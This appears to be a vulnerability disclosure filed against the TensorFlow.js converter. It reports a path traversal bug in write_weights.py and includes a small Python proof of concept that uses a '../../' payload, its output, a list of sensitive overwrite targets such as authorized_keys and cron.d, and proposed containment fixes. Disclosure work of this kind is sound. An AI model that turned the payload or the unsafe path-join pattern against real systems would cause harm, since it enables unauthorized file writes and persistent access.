Description
Path Traversal Vulnerability in write_weights.py Allows Arbitrary File Write
System information
- Have I written custom code: Yes (minimal PoC)
- OS Platform: Windows 11 & Ubuntu 22.04
- Mobile device: N/A
- TensorFlow.js installed from: pip (tensorflowjs package)
- TensorFlow.js version: 4.20.0
- Browser version: N/A (Python-side issue)
- TensorFlow.js Converter Version: 4.20.0
Describe the current behavior
The TensorFlow.js converter (tfjs-converter pip package) contains a path traversal vulnerability inside the function _shard_group_bytes_to_disk located in:
tfjs-converter/python/tensorflowjs/write_weights.py
The vulnerable code (lines 300–306) is:
filename = 'group%d-shard%dof%d.bin' % (group_index + 1, i + 1, num_shards)
filenames.append(filename)
filepath = os.path.join(write_dir, filename)
# Write the shard to disk.
with tf.io.gfile.GFile(filepath, 'wb') as f:
    f.write(shard)
os.path.join() does not prevent path traversal. If write_dir contains values such as "../../", the converter writes files outside the intended output directory.
There is no path normalization (os.path.abspath), no sanitization, and no prefix enforcement to keep writes inside the sandbox.
This results in arbitrary file write on the host filesystem.
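The behavior of os.path.join described above can be illustrated with a short sketch. It uses posixpath (the POSIX implementation behind os.path) so the results are the same on any OS; the directory and file names are hypothetical and chosen only for illustration.

```python
import posixpath

# Hypothetical output directory, used only for illustration.
write_dir = "/srv/models/out"

# A relative segment containing ".." is kept verbatim by join() ...
joined = posixpath.join(write_dir, "../../escape.bin")
# ... and collapses to a location outside write_dir once normalized.
normalized = posixpath.normpath(joined)

# An absolute second argument discards write_dir entirely.
absolute = posixpath.join(write_dir, "/etc/cron.d/job")

print(joined)      # /srv/models/out/../../escape.bin
print(normalized)  # /srv/escape.bin
print(absolute)    # /etc/cron.d/job
```

In both cases join() returns a path without raising, so any containment check has to be done explicitly by the caller.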
Describe the expected behavior
The converter should ensure that shard output paths always remain inside the intended directory by:
- Normalizing output paths (os.path.abspath/realpath)
- Rejecting traversal (.., absolute paths, symlinks)
- Enforcing prefix containment (if not resolved.startswith(write_dir): error)
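A minimal sketch of such a check is shown here. The helper name resolve_inside is hypothetical and is not part of tensorflowjs. It uses os.path.commonpath rather than a raw startswith comparison, because a string prefix test would accept a sibling directory such as /out_evil as if it were inside /out.

```python
import os
import tempfile


def resolve_inside(base_dir, filename):
    """Return the resolved path of filename under base_dir, or raise ValueError.

    Hypothetical helper for illustration; not part of tensorflowjs.
    """
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath compares whole path components, so "/out_evil" is not
    # mistaken for a child of "/out" the way a plain startswith() would be.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes output directory: %r" % filename)
    return candidate


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as out_dir:
        # A normal shard name resolves to a path inside out_dir.
        print(resolve_inside(out_dir, "group1-shard1of1.bin"))
        try:
            resolve_inside(out_dir, "../../PWNED_BY_TFJS.txt")
        except ValueError as err:
            print("rejected:", err)
```

A caller would resolve the shard path with this helper and only then open the file for writing. Note that a check-then-write sequence can still race with a concurrently created symlink, so this is a sketch of the containment idea rather than a complete hardening.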
Standalone code to reproduce the issue
Save this file as reproduce_tfjs_path_traversal.py:
import os
import numpy as np

if not hasattr(np, 'object'):
    np.object = object
if not hasattr(np, 'bool'):
    np.bool = bool

# Vulnerable logic derived from write_weights.py
def _shard_group_bytes_to_disk_VULN(write_dir, filename, data):
    filepath = os.path.join(write_dir, filename)
    os.makedirs(os.path.dirname(filepath), exist_ok=True)
    with open(filepath, 'wb') as f:
        f.write(data)
    return filepath

# Safe directory
safe_zone = os.path.abspath("safe_zone")
os.makedirs(safe_zone, exist_ok=True)

# Directory traversal payload
malicious_payload = "../../PWNED_BY_TFJS.txt"

print("[*] Base directory:", safe_zone)
print("[*] Attempting path traversal...")
result = _shard_group_bytes_to_disk_VULN(
    safe_zone,
    malicious_payload,
    b"TEST"
)
print("Final path:", os.path.abspath(result))
How to run
python reproduce_tfjs_path_traversal.py
Observed output
[*] Base directory: /path/to/safe_zone
[*] Attempting path traversal...
Final path: /path/PWNED_BY_TFJS.txt
This confirms that the file write occurred outside the intended directory: the payload climbs two levels above safe_zone.
Explanation
The issue occurs because the line
filepath = os.path.join(write_dir, filename)
blindly trusts its input. If an attacker controls the model path or conversion directory (common in JupyterHub, shared ML pipelines, CI/CD model converters, and API upload-to-convert services), they can write anywhere the converter process has write permission, including:
- ~/.ssh/authorized_keys (persistent access)
- /etc/cron.d/* (code execution)
- service startup scripts
- Python module override (import-time code execution)
- user files in shared environments (overwrite)
This is a correctness and safety bug in the TensorFlow.js converter logic.
Other info / logs
- The VRP team already confirmed that public disclosure is permitted: “Users are recommended to run untrusted models in a sandbox. You may disclose publicly.”
- This is still unsafe behavior for a machine learning converter that frequently processes untrusted paths.